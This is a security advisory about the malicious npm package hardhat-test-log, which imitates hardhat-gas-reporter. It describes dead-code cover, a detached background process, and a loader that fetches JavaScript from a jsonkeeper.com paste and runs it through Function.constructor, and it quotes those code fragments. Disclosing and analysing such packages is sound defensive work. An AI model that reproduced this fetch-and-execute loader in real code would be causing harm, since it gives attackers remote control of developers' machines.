MAL-2026-6369
Malicious code in hardhat-test-log (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c8eaf29821b0a2792ecc08837bdd52a09bee062279d6c8c83f5f15855b1098f6)

Package impersonates the legitimate hardhat-gas-reporter / eth-gas-reporter: the README is a near-verbatim copy referencing eth-gas-reporter, while the package.json name is hardhat-test-log.

The exported reporter function in index.js sets `var opt = 1` and unconditionally takes the `else` branch, so the plausible Mocha-reporter implementation in the `if (!opt)` block is dead code that exists only as cover.

The reachable branch calls `utils.connectNet(...)` in lib/utils.js, which uses `child_process.spawn('node', [lib/syncResolve.js, ...], { detached: true, stdio: ['ignore'] })` followed by `progs.unref()` to launch a detached, output-suppressed background process that survives the parent test runner.

lib/syncResolve.js then performs `axios.get('https://www.jsonkeeper.com/b/NB36A', { headers: { 'x-secret-key': '_' } })`, reads `data.Cookie` from the response, and executes it via `new Function.constructor('require', result)(require)`. Because `Function.constructor` is `Function` itself, this compiles the fetched string as a function body with `require` in scope: full remote code execution in the developer's Node process.

jsonkeeper.com is an anonymous free JSON paste host whose content the author can mutate at any time, so any developer who installs this package and runs a Hardhat/Mocha test suite with this reporter executes whatever JavaScript the author chooses to host there. A payload observed at one point in time says nothing about what is served later, so a benign-looking response during analysis is not evidence that the package is safe.
Affected packages
No fixed version published yet for hardhat-test-log (npm). Because the package is malicious by design rather than a legitimate package with a vulnerable release, there is no known-safe version to pin to: remove it from your dependencies and lockfile, use the legitimate hardhat-gas-reporter instead, and treat any machine that ran a test suite with this reporter installed as having executed attacker-controlled code.